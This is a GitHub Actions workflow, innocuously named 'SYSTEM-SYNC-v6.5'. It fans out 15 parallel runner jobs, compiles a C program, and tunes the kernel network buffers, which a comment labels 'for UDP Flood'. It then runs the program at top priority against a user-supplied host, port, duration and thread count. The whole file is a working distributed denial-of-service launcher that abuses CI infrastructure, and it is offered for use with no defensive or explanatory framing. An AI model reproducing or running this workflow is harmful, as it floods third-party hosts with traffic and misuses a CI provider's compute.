name: ⚔️ SYSTEM-SYNC-v6.5 ⚔️

on:
  workflow_dispatch:
    inputs:
      host: { required: true }
      port: { required: true }
      time: { required: true }
      threads: { required: true }

jobs:
  STORM-EXECUTION:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        node: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15] 
    steps:
      - name: 🛰️ INITIALIZING
        uses: actions/checkout@v4

      - name: 🔥 FIRING GHOST v6.5
        run: |
          # High Speed Optimization Flags
          gcc -Ofast -march=native prime.c -o PRIME -lpthread
          chmod +x PRIME
          
          # Tuning Linux Network Stack for UDP Flood
          sudo sysctl -w net.core.rmem_max=4194304
          sudo sysctl -w net.core.wmem_max=4194304
          sudo sysctl -w net.ipv4.udp_mem='65536 131072 262144'
          
          # Max Priority Execution on both CPU cores
          sudo nice -n -20 taskset -c 0,1 ./PRIME ${{ github.event.inputs.host }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.threads }}
          
